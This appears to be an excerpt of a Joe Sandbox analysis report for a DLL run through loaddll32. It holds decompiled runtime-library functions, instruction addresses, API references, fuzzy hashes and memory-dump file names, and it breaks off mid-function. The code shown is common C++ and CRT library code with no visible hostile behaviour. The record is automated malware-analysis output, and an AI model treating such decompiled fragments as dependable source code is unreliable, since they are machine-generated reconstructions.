              			E6DA85D90(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v44;
				signed int _v48;
				signed int _v60;
				intOrPtr _v68;
				signed int _v80;
				void* _t132;
				void* _t148;
				signed int _t151;
				unsigned int _t153;
				void* _t154;
				signed int _t169;
				signed int* _t171;
				signed int _t172;
				unsigned int _t174;
				void* _t175;
				signed int _t178;
				signed int _t193;
				signed int* _t195;
				signed int _t196;
				unsigned int _t198;
				void* _t199;
				signed int _t213;
				signed int* _t215;
				void* _t218;
				signed int _t223;
				signed int _t224;
				signed int _t226;
				signed int* _t228;
				signed int* _t229;
				signed int* _t230;
				signed int* _t239;
				signed int* _t245;
				void* _t247;
				void* _t254;
				void* _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t266;
				unsigned int _t268;
				signed int _t269;
				signed int _t280;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				signed int _t286;
				unsigned int _t287;
				signed int _t288;
				signed int _t290;
				signed int _t294;
				signed int _t295;
				signed int _t297;
				signed int _t300;
				signed int _t301;
				signed int _t303;
				intOrPtr _t306;
				void* _t308;
				void* _t309;
				intOrPtr _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t339;

				_t306 = _t317;
				_push(0xffffffff);
				_push(E6DAA2685);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t317;
				_t318 = _t317 - 0xc;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				E6DA888D6( &_v28, 0);
				_v8 = 0;
				_t266 =  *0x6dad5cb8; // 0x0
				_t226 =  *0x6dad5c78; // 0x0
				_v20 = _t226;
				if(_t266 == 0) {
					E6DA888D6( &_v24, _t266);
					_t339 =  *0x6dad5cb8 - _t266; // 0x0
					if(_t339 == 0) {
						_t223 =  *0x6dad5048; // 0x0
						_t224 = _t223 + 1;
						 *0x6dad5048 = _t224;
						 *0x6dad5cb8 = _t224;
					}
					E6DA8892E( &_v24);
					_t266 =  *0x6dad5cb8; // 0x0
				}
				_t239 =  *(_a4 + 4);
				if(_t266 >= _t239[3]) {
					_t280 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t280 =  *(_t239[2] + _t266 * 4);
					if(_t280 != 0) {
						L16:
						E6DA8892E( &_v28);
						 *[fs:0x0] = _v16;
						return _t280;
					} else {
						L8:
						if(_t239[5] == 0) {
							L11:
							if(_t280 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t218 = E6DA88AB3();
							if(_t266 >=  *((intOrPtr*)(_t218 + 0xc))) {
								L12:
								if(_t226 == 0) {
									_t132 = E6DA862F0(_t226, _t266,  &_v20, _a4);
									_t320 = _t318 + 8;
									__eflags = _t132 - 0xffffffff;
									if(__eflags == 0) {
										E6DA82950();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t306);
										_t308 = _t320;
										_t321 = _t320 - 8;
										_push(_t226);
										_t228 = _t239;
										_t242 = 0x7fffffff;
										_push(_t280);
										_t282 = _v32;
										_t261 = _t228[4];
										_v44 = _t261;
										_push(_t266);
										__eflags = 0x7fffffff - _t261 - _t282;
										if(__eflags < 0) {
											E6DA814C0(_t228, 0x7fffffff, _t261, __eflags);
											goto L39;
										} else {
											_t266 = _t228[5];
											_t196 = _t261 + _t282;
											_v16 = _t196;
											_t300 = _t196 | 0x0000000f;
											_v0 = _t266;
											__eflags = _t300 - 0x7fffffff;
											if(__eflags <= 0) {
												_t198 = _t266 >> 1;
												_t242 = 0x7fffffff - _t198;
												__eflags = _t266 - _t242;
												if(__eflags <= 0) {
													_t199 = _t198 + _t266;
													__eflags = _t300 - _t199;
													_t282 =  <  ? _t199 : _t300;
													_t35 = _t282 + 1; // 0x80000000
													_t242 = _t35;
													__eflags = _t242 - 0x1000;
													if(_t242 < 0x1000) {
														__eflags = _t242;
														if(__eflags == 0) {
															_t266 = 0;
															__eflags = 0;
														} else {
															_t213 = E6DA89399(_t266, _t282, __eflags, _t242);
															_t261 = _v12;
															_t321 = _t321 + 4;
															_t266 = _t213;
														}
														goto L32;
													} else {
														_t36 =  &(_t242[8]); // 0x80000023
														_t214 = _t36;
														__eflags = _t36 - _t242;
														if(__eflags <= 0) {
															L39:
															E6DA81420();
															goto L40;
														} else {
															goto L22;
														}
													}
												} else {
													_t282 = 0x7fffffff;
													goto L21;
												}
											} else {
												_t282 = 0x7fffffff;
												L21:
												_t214 = 0x80000023;
												L22:
												_t215 = E6DA89399(_t266, _t282, __eflags, _t214);
												_t321 = _t321 + 4;
												__eflags = _t215;
												if(_t215 == 0) {
													L40:
													E6DA8DACF(_t228, _t242, _t261);
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													asm("int3");
													_push(_t308);
													_t309 = _t321;
													_t322 = _t321 - 0xc;
													_t262 = _v48;
													_push(_t228);
													_t229 = _t242;
													_t243 = 0x7fffffff;
													_push(_t282);
													_push(_t266);
													_t283 = _t229[4];
													_v60 = _t283;
													__eflags = 0x7fffffff - _t283 - _t262;
													if(__eflags < 0) {
														E6DA814C0(_t229, 0x7fffffff, _t262, __eflags);
														goto L62;
													} else {
														_t266 = _t229[5];
														_t172 = _t283 + _t262;
														_v20 = _t172;
														_t294 = _t172 | 0x0000000f;
														_v4 = _t266;
														__eflags = _t294 - 0x7fffffff;
														if(__eflags <= 0) {
															_t174 = _t266 >> 1;
															_t243 = 0x7fffffff - _t174;
															__eflags = _t266 - _t243;
															if(__eflags <= 0) {
																_t175 = _t174 + _t266;
																__eflags = _t294 - _t175;
																_t283 =  <  ? _t175 : _t294;
																_t65 = _t283 + 1; // 0x80000000
																_t243 = _t65;
																__eflags = _t243 - 0x1000;
																if(_t243 < 0x1000) {
																	__eflags = _t243;
																	if(__eflags == 0) {
																		_t266 = 0;
																		__eflags = 0;
																	} else {
																		_t193 = E6DA89399(_t266, _t283, __eflags, _t243);
																		_t322 = _t322 + 4;
																		_t266 = _t193;
																	}
																	goto L55;
																} else {
																	_t66 = _t243 + 0x23; // 0x80000023
																	_t194 = _t66;
																	__eflags = _t66 - _t243;
																	if(__eflags <= 0) {
																		L62:
																		E6DA81420();
																		goto L63;
																	} else {
																		goto L45;
																	}
																}
															} else {
																_t283 = 0x7fffffff;
																goto L44;
															}
														} else {
															_t283 = 0x7fffffff;
															L44:
															_t194 = 0x80000023;
															L45:
															_t195 = E6DA89399(_t266, _t283, __eflags, _t194);
															_t322 = _t322 + 4;
															__eflags = _t195;
															if(_t195 == 0) {
																L63:
																E6DA8DACF(_t229, _t243, _t262);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t309);
																_t323 = _t322 - 8;
																_push(_t229);
																_t230 = _t243;
																_t244 = 0x7fffffff;
																_push(_t283);
																_t284 = _v68;
																_t263 = _t230[4];
																_v80 = _t263;
																_push(_t266);
																__eflags = 0x7fffffff - _t263 - _t284;
																if(__eflags < 0) {
																	E6DA814C0(_t230, 0x7fffffff, _t263, __eflags);
																	goto L85;
																} else {
																	_t268 = _t230[5];
																	_t151 = _t263 + _t284;
																	_v24 = _t151;
																	_t286 = _t151 | 0x0000000f;
																	_v8 = _t268;
																	__eflags = _t286 - 0x7fffffff;
																	if(__eflags <= 0) {
																		_t153 = _t268 >> 1;
																		_t244 = 0x7fffffff - _t153;
																		__eflags = _t268 - _t244;
																		if(__eflags <= 0) {
																			_t154 = _t153 + _t268;
																			__eflags = _t286 - _t154;
																			_t287 =  <  ? _t154 : _t286;
																			_t104 = _t287 + 1; // 0x80000000
																			_t244 = _t104;
																			__eflags = _t244 - 0x1000;
																			if(_t244 < 0x1000) {
																				__eflags = _t244;
																				if(__eflags == 0) {
																					_t269 = 0;
																					__eflags = 0;
																				} else {
																					_t169 = E6DA89399(_t268, _t287, __eflags, _t244);
																					_t263 = _v20;
																					_t323 = _t323 + 4;
																					_t269 = _t169;
																				}
																				goto L78;
																			} else {
																				_t105 = _t244 + 0x23; // 0x80000023
																				_t170 = _t105;
																				__eflags = _t105 - _t244;
																				if(__eflags <= 0) {
																					L85:
																					E6DA81420();
																					goto L86;
																				} else {
																					goto L68;
																				}
																			}
																		} else {
																			_t287 = 0x7fffffff;
																			goto L67;
																		}
																	} else {
																		_t287 = 0x7fffffff;
																		L67:
																		_t170 = 0x80000023;
																		L68:
																		_t171 = E6DA89399(_t268, _t287, __eflags, _t170);
																		_t323 = _t323 + 4;
																		__eflags = _t171;
																		if(_t171 == 0) {
																			L86:
																			_t148 = E6DA8DACF(_t230, _t244, _t263);
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			asm("int3");
																			_t245 =  *_t244;
																			__eflags = _t245;
																			if(_t245 != 0) {
																				return  *( *_t245)(1);
																			}
																			return _t148;
																		} else {
																			_t263 = _v20;
																			_t102 =  &(_t171[8]); // 0x23
																			_t269 = _t102 & 0xffffffe0;
																			 *(_t269 - 4) = _t171;
																			L78:
																			_t230[4] = _v24;
																			_t230[5] = _t287;
																			_t288 = _t269 + _t263;
																			_v24 = _t288;
																			__eflags = _v8 - 0x10;
																			_v20 = _v0 + _t288;
																			_push(_t263);
																			if(_v8 < 0x10) {
																				_push(_t230);
																				_push(_t269);
																				E6DA8AB10();
																				E6DA8B0A0(_t269, _t288, _a4, _v0);
																				 *_v20 = 0;
																				 *_t230 = _t269;
																				return _t230;
																			} else {
																				_t290 =  *_t230;
																				_push(_t290);
																				_push(_t269);
																				E6DA8AB10();
																				E6DA8B0A0(_t269, _v24, _a4, _v0);
																				_t247 = _v8 + 1;
																				 *_v20 = 0;
																				__eflags = _t247 - 0x1000;
																				if(_t247 < 0x1000) {
																					L82:
																					_push(_t247);
																					E6DA893C9(_t290);
																					 *_t230 = _t269;
																					return _t230;
																				} else {
																					_t263 =  *(_t290 - 4);
																					_t244 = _t247 + 0x23;
																					_t123 = _t290 - _t263 - 4; // 0x7ffffffb
																					__eflags = _t123 - 0x1f;
																					if(_t123 > 0x1f) {
																						goto L86;
																					} else {
																						_t290 = _t263;
																						goto L82;
																					}
																				}
																			}
																		}
																	}
																}
															} else {
																_t63 =  &(_t195[8]); // 0x23
																_t266 = _t63 & 0xffffffe0;
																 *(_t266 - 4) = _t195;
																L55:
																_t229[4] = _v20;
																_t178 = _a4;
																_t229[5] = _t283;
																_v16 = _v16 - _t178 + 1;
																_t295 = _t266 + _t178;
																_v24 = _t295;
																__eflags = _v4 - 0x10;
																_v20 = _a8 + _t295;
																_push(_t178);
																if(_v4 < 0x10) {
																	_push(_t229);
																	_push(_t266);
																	E6DA8AB10();
																	E6DA8B0A0(_t266, _t295, _a12, _a8);
																	__eflags = _t229 + _a4;
																	E6DA8AB10(_v20, _t229 + _a4, _v16);
																	 *_t229 = _t266;
																	return _t229;
																} else {
																	_t297 =  *_t229;
																	_push(_t297);
																	_push(_t266);
																	E6DA8AB10();
																	E6DA8B0A0(_t266, _v24, _a12, _a8);
																	E6DA8AB10(_v20, _a4 + _t297, _v16);
																	_t322 = _t322 + 0x24;
																	_t254 = _v4 + 1;
																	__eflags = _t254 - 0x1000;
																	if(_t254 < 0x1000) {
																		L59:
																		_push(_t254);
																		E6DA893C9(_t297);
																		 *_t229 = _t266;
																		return _t229;
																	} else {
																		_t262 =  *(_t297 - 4);
																		_t243 = _t254 + 0x23;
																		_t283 = _t297 - _t262;
																		_t88 = _t283 - 4; // 0x7ffffffb
																		__eflags = _t88 - 0x1f;
																		if(_t88 > 0x1f) {
																			goto L63;
																		} else {
																			_t297 = _t262;
																			goto L59;
																		}
																	}
																}
															}
														}
													}
												} else {
													_t261 = _v12;
													_t33 =  &(_t215[8]); // 0x23
													_t266 = _t33 & 0xffffffe0;
													 *(_t266 - 4) = _t215;
													L32:
													_t228[4] = _v16;
													_t228[5] = _t282;
													_t301 = _t266 + _t261;
													_v16 = _t301;
													__eflags = _v0 - 0x10;
													_v12 = _a12 + _t301;
													_push(_t261);
													if(_v0 < 0x10) {
														_push(_t228);
														_push(_t266);
														E6DA8AB10();
														E6DA8AB10(_t301, _a8, _a12);
														 *_v12 = 0;
														 *_t228 = _t266;
														return _t228;
													} else {
														_t303 =  *_t228;
														_push(_t303);
														_push(_t266);
														E6DA8AB10();
														E6DA8AB10(_v16, _a8, _a12);
														_t321 = _t321 + 0x18;
														_t256 = _v0 + 1;
														 *_v12 = 0;
														__eflags = _t256 - 0x1000;
														if(_t256 < 0x1000) {
															L36:
															_push(_t256);
															E6DA893C9(_t303);
															 *_t228 = _t266;
															return _t228;
														} else {
															_t261 =  *(_t303 - 4);
															_t242 = _t256 + 0x23;
															_t282 = _t303 - _t261;
															_t52 = _t282 - 4; // 0x7ffffffb
															__eflags = _t52 - 0x1f;
															if(_t52 > 0x1f) {
																goto L40;
															} else {
																_t303 = _t261;
																goto L36;
															}
														}
													}
												}
											}
										}
									} else {
										_t280 = _v20;
										_a4 = _t280;
										_v8 = 1;
										E6DA88A87(__eflags, _t280);
										 *((intOrPtr*)( *_t280 + 4))();
										 *0x6dad5c78 = _t280;
										goto L16;
									}
								} else {
									_t280 = _t226;
									goto L16;
								}
							} else {
								_t280 =  *( *((intOrPtr*)(_t218 + 8)) + _t266 * 4);
								goto L11;
							}
						}
					}
				}
			}













































































              0x6da85d91
              0x6da85d93
              0x6da85d95
              0x6da85da0
              0x6da85da1
              0x6da85da8
              0x6da85dab
              0x6da85dac
              0x6da85dad
              0x6da85db3
              0x6da85db8
              0x6da85dbf
              0x6da85dc5
              0x6da85dcb
              0x6da85dd0
              0x6da85dd6
              0x6da85ddb
              0x6da85de1
              0x6da85de3
              0x6da85de8
              0x6da85de9
              0x6da85dee
              0x6da85dee
              0x6da85df6
              0x6da85dfb
              0x6da85dfb
              0x6da85e04
              0x6da85e0a
              0x6da85e18
              0x6da85e18
              0x00000000
              0x6da85e0c
              0x6da85e0f
              0x6da85e14
              0x6da85e70
              0x6da85e73
              0x6da85e80
              0x6da85e8a
              0x6da85e16
              0x6da85e1a
              0x6da85e1e
              0x6da85e30
              0x6da85e32
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da85e20
              0x6da85e20
              0x6da85e28
              0x6da85e34
              0x6da85e36
              0x6da85e43
              0x6da85e48
              0x6da85e4b
              0x6da85e4e
              0x6da85e8b
              0x6da85e90
              0x6da85e91
              0x6da85e92
              0x6da85e93
              0x6da85e94
              0x6da85e95
              0x6da85e96
              0x6da85e97
              0x6da85e98
              0x6da85e99
              0x6da85e9a
              0x6da85e9b
              0x6da85e9c
              0x6da85e9d
              0x6da85e9e
              0x6da85e9f
              0x6da85ea0
              0x6da85ea1
              0x6da85ea3
              0x6da85ea6
              0x6da85ea7
              0x6da85ea9
              0x6da85eb0
              0x6da85eb1
              0x6da85eb4
              0x6da85eb9
              0x6da85ebc
              0x6da85ebd
              0x6da85ebf
              0x6da85fe2
              0x00000000
              0x6da85ec5
              0x6da85ec5
              0x6da85ec8
              0x6da85ecd
              0x6da85ed0
              0x6da85ed3
              0x6da85ed6
              0x6da85ed8
              0x6da85f02
              0x6da85f04
              0x6da85f06
              0x6da85f08
              0x6da85f11
              0x6da85f13
              0x6da85f15
              0x6da85f18
              0x6da85f18
              0x6da85f1b
              0x6da85f21
              0x6da85f30
              0x6da85f32
              0x6da85f44
              0x6da85f44
              0x6da85f34
              0x6da85f35
              0x6da85f3a
              0x6da85f3d
              0x6da85f40
              0x6da85f40
              0x00000000
              0x6da85f23
              0x6da85f23
              0x6da85f23
              0x6da85f26
              0x6da85f28
              0x6da85fe7
              0x6da85fe7
              0x00000000
              0x6da85f2e
              0x00000000
              0x6da85f2e
              0x6da85f28
              0x6da85f0a
              0x6da85f0a
              0x00000000
              0x6da85f0a
              0x6da85eda
              0x6da85eda
              0x6da85edc
              0x6da85edc
              0x6da85ee1
              0x6da85ee2
              0x6da85ee7
              0x6da85eea
              0x6da85eec
              0x6da85fec
              0x6da85fec
              0x6da85ff1
              0x6da85ff2
              0x6da85ff3
              0x6da85ff4
              0x6da85ff5
              0x6da85ff6
              0x6da85ff7
              0x6da85ff8
              0x6da85ff9
              0x6da85ffa
              0x6da85ffb
              0x6da85ffc
              0x6da85ffd
              0x6da85ffe
              0x6da85fff
              0x6da86000
              0x6da86001
              0x6da86003
              0x6da86006
              0x6da86009
              0x6da8600a
              0x6da8600c
              0x6da86011
              0x6da86014
              0x6da86015
              0x6da8601a
              0x6da8601d
              0x6da8601f
              0x6da86165
              0x00000000
              0x6da86025
              0x6da86025
              0x6da86028
              0x6da8602d
              0x6da86030
              0x6da86033
              0x6da86036
              0x6da86038
              0x6da8605f
              0x6da86061
              0x6da86063
              0x6da86065
              0x6da8606e
              0x6da86070
              0x6da86072
              0x6da86075
              0x6da86075
              0x6da86078
              0x6da8607e
              0x6da8608d
              0x6da8608f
              0x6da8609e
              0x6da8609e
              0x6da86091
              0x6da86092
              0x6da86097
              0x6da8609a
              0x6da8609a
              0x00000000
              0x6da86080
              0x6da86080
              0x6da86080
              0x6da86083
              0x6da86085
              0x6da8616a
              0x6da8616a
              0x00000000
              0x6da8608b
              0x00000000
              0x6da8608b
              0x6da86085
              0x6da86067
              0x6da86067
              0x00000000
              0x6da86067
              0x6da8603a
              0x6da8603a
              0x6da8603c
              0x6da8603c
              0x6da86041
              0x6da86042
              0x6da86047
              0x6da8604a
              0x6da8604c
              0x6da8616f
              0x6da8616f
              0x6da86174
              0x6da86175
              0x6da86176
              0x6da86177
              0x6da86178
              0x6da86179
              0x6da8617a
              0x6da8617b
              0x6da8617c
              0x6da8617d
              0x6da8617e
              0x6da8617f
              0x6da86180
              0x6da86183
              0x6da86186
              0x6da86187
              0x6da86189
              0x6da86190
              0x6da86191
              0x6da86194
              0x6da86199
              0x6da8619c
              0x6da8619d
              0x6da8619f
              0x6da862c9
              0x00000000
              0x6da861a5
              0x6da861a5
              0x6da861a8
              0x6da861ad
              0x6da861b0
              0x6da861b3
              0x6da861b6
              0x6da861b8
              0x6da861e2
              0x6da861e4
              0x6da861e6
              0x6da861e8
              0x6da861f1
              0x6da861f3
              0x6da861f5
              0x6da861f8
              0x6da861f8
              0x6da861fb
              0x6da86201
              0x6da86210
              0x6da86212
              0x6da86224
              0x6da86224
              0x6da86214
              0x6da86215
              0x6da8621a
              0x6da8621d
              0x6da86220
              0x6da86220
              0x00000000
              0x6da86203
              0x6da86203
              0x6da86203
              0x6da86206
              0x6da86208
              0x6da862ce
              0x6da862ce
              0x00000000
              0x6da8620e
              0x00000000
              0x6da8620e
              0x6da86208
              0x6da861ea
              0x6da861ea
              0x00000000
              0x6da861ea
              0x6da861ba
              0x6da861ba
              0x6da861bc
              0x6da861bc
              0x6da861c1
              0x6da861c2
              0x6da861c7
              0x6da861ca
              0x6da861cc
              0x6da862d3
              0x6da862d3
              0x6da862d8
              0x6da862d9
              0x6da862da
              0x6da862db
              0x6da862dc
              0x6da862dd
              0x6da862de
              0x6da862df
              0x6da862e0
              0x6da862e2
              0x6da862e4
              0x00000000
              0x6da862ea
              0x6da862ec
              0x6da861d2
              0x6da861d2
              0x6da861d5
              0x6da861d8
              0x6da861db
              0x6da86226
              0x6da86229
              0x6da86236
              0x6da86239
              0x6da8623e
              0x6da86241
              0x6da86245
              0x6da86248
              0x6da86249
              0x6da862a0
              0x6da862a1
              0x6da862a2
              0x6da862ae
              0x6da862b9
              0x6da862be
              0x6da862c6
              0x6da8624b
              0x6da8624b
              0x6da8624d
              0x6da8624e
              0x6da8624f
              0x6da8625d
              0x6da8626b
              0x6da8626c
              0x6da8626f
              0x6da86275
              0x6da86289
              0x6da86289
              0x6da8628b
              0x6da86293
              0x6da8629d
              0x6da86277
              0x6da86277
              0x6da8627a
              0x6da8627f
              0x6da86282
              0x6da86285
              0x00000000
              0x6da86287
              0x6da86287
              0x00000000
              0x6da86287
              0x6da86285
              0x6da86275
              0x6da86249
              0x6da861cc
              0x6da861b8
              0x6da86052
              0x6da86052
              0x6da86055
              0x6da86058
              0x6da860a0
              0x6da860a6
              0x6da860b0
              0x6da860b6
              0x6da860b9
              0x6da860bf
              0x6da860c4
              0x6da860c7
              0x6da860cb
              0x6da860ce
              0x6da860cf
              0x6da86131
              0x6da86132
              0x6da86133
              0x6da8613f
              0x6da8614a
              0x6da86150
              0x6da86158
              0x6da86162
              0x6da860d1
              0x6da860d1
              0x6da860d3
              0x6da860d4
              0x6da860d5
              0x6da860e3
              0x6da860f4
              0x6da860fc
              0x6da860ff
              0x6da86100
              0x6da86106
              0x6da8611a
              0x6da8611a
              0x6da8611c
              0x6da86124
              0x6da8612e
              0x6da86108
              0x6da86108
              0x6da8610b
              0x6da8610e
              0x6da86110
              0x6da86113
              0x6da86116
              0x00000000
              0x6da86118
              0x6da86118
              0x00000000
              0x6da86118
              0x6da86116
              0x6da86106
              0x6da860cf
              0x6da8604c
              0x6da86038
              0x6da85ef2
              0x6da85ef2
              0x6da85ef5
              0x6da85ef8
              0x6da85efb
              0x6da85f46
              0x6da85f49
              0x6da85f4f
              0x6da85f52
              0x6da85f57
              0x6da85f5a
              0x6da85f5e
              0x6da85f61
              0x6da85f62
              0x6da85fb9
              0x6da85fba
              0x6da85fbb
              0x6da85fc7
              0x6da85fd2
              0x6da85fd7
              0x6da85fdf
              0x6da85f64
              0x6da85f64
              0x6da85f66
              0x6da85f67
              0x6da85f68
              0x6da85f76
              0x6da85f7e
              0x6da85f84
              0x6da85f85
              0x6da85f88
              0x6da85f8e
              0x6da85fa2
              0x6da85fa2
              0x6da85fa4
              0x6da85fac
              0x6da85fb6
              0x6da85f90
              0x6da85f90
              0x6da85f93
              0x6da85f96
              0x6da85f98
              0x6da85f9b
              0x6da85f9e
              0x00000000
              0x6da85fa0
              0x6da85fa0
              0x00000000
              0x6da85fa0
              0x6da85f9e
              0x6da85f8e
              0x6da85f62
              0x6da85eec
              0x6da85ed8
              0x6da85e50
              0x6da85e50
              0x6da85e53
              0x6da85e57
              0x6da85e5b
              0x6da85e67
              0x6da85e6a
              0x00000000
              0x6da85e6a
              0x6da85e38
              0x6da85e38
              0x00000000
              0x6da85e38
              0x6da85e2a
              0x6da85e2d
              0x00000000
              0x6da85e2d
              0x6da85e28
              0x6da85e1e
              0x6da85e14

              APIs
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85DB3
              • std::_Lockit::_Lockit.LIBCPMT ref: 6DA85DD6
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85DF6
              • std::_Facet_Register.LIBCPMT ref: 6DA85E5B
              • std::_Lockit::~_Lockit.LIBCPMT ref: 6DA85E73
              • Concurrency::cancel_current_task.LIBCPMT ref: 6DA85E8B
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
              • String ID:
              • API String ID: 2081738530-0
              • Opcode ID: a1d4ef544a178734a718e033f4c683ebb14b9b604473f0877cfc53e1cfa0f83e
              • Instruction ID: ec7348603e9718531c4e17fdf900010d468994624e0f82a83f78ff6da2f353b3
              • Opcode Fuzzy Hash: a1d4ef544a178734a718e033f4c683ebb14b9b604473f0877cfc53e1cfa0f83e
              • Instruction Fuzzy Hash: C731AF7590C315DFCB21CF58D980B7ABBB5FB06324F194159DD0667282DB30A982CBD1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8C471 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 85%
              			E6DA8C471(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x6dab3030 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E6DA8D66B(_t13, __eflags,  *0x6dab3030);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6DA8D6A6(_t14, __eflags,  *0x6dab3030, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6DA8DD0F();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6DA8D6A6(_t18, __eflags,  *0x6dab3030, 0);
								} else {
									_t8 = E6DA8D6A6(_t18, __eflags,  *0x6dab3030, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6DA8DCF4(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












              0x6da8c471
              0x6da8c478
              0x6da8c48b
              0x6da8c492
              0x6da8c494
              0x6da8c495
              0x6da8c498
              0x6da8c4b1
              0x6da8c4b1
              0x6da8c49a
              0x6da8c49a
              0x6da8c49c
              0x6da8c4a6
              0x6da8c4ad
              0x6da8c4af
              0x6da8c4b6
              0x6da8c4bf
              0x6da8c4c2
              0x6da8c4c3
              0x6da8c4c5
              0x6da8c4d9
              0x6da8c4d9
              0x6da8c4e2
              0x6da8c4c7
              0x6da8c4ce
              0x6da8c4d4
              0x6da8c4d5
              0x6da8c4d7
              0x6da8c4eb
              0x6da8c4ed
              0x6da8c4ed
              0x00000000
              0x00000000
              0x00000000
              0x6da8c4d7
              0x6da8c4f0
              0x00000000
              0x00000000
              0x00000000
              0x6da8c4af
              0x6da8c49c
              0x6da8c4f8
              0x6da8c502
              0x6da8c47a
              0x6da8c47c
              0x6da8c47c

              APIs
              • GetLastError.KERNEL32(00000001,?,6DA8C382,6DA895C8,6DA89859,?,6DA89A91,?,00000001,?,?,00000001,?,6DAB10F8,0000000C,6DA89B8A), ref: 6DA8C47F
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DA8C48D
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DA8C4A6
              • SetLastError.KERNEL32(00000000,6DA89A91,?,00000001,?,?,00000001,?,6DAB10F8,0000000C,6DA89B8A,?,00000001,?), ref: 6DA8C4F8
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: fd5e9ca00b1182e997b0515a81a52fbf6a0c2d6feb4982b2c27e743f46f58b97
              • Instruction ID: 7490c85b6b685a9d7350b376a85f33d22c64c6d3cca3e8ecb42426ea8c9a274f
              • Opcode Fuzzy Hash: fd5e9ca00b1182e997b0515a81a52fbf6a0c2d6feb4982b2c27e743f46f58b97
              • Instruction Fuzzy Hash: 86014C3612E7235FAB102AB4AC88B363674EF47678725433BFE95841E2EF6148C39544
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8D512 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E6DA8D512(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
